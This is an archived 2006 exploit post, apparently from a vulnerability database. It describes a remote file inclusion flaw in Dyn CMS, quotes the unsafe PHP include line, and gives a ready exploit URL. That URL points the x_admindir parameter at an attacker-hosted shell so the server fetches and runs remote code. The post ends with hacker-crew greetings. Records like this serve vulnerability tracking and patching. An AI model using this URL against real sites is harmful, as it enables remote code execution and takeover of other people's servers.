Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14134
HistorySep 04, 2006 - 12:00 a.m.

Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit

2006-09-0400:00:00
vulners.com
38

#==============================================================================================
#Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://www.dyncms.com/

#Version : REleased

#================================================================================================
#Bug in : 0_admin/modules/Wochenkarte/frontend/index.php

#Vlu Code :
#--------------------------------

include_once($x_admindir."/modules/".$xmodulname."/frontend/tools.inc.php");

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://SHELLURL.COM?

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior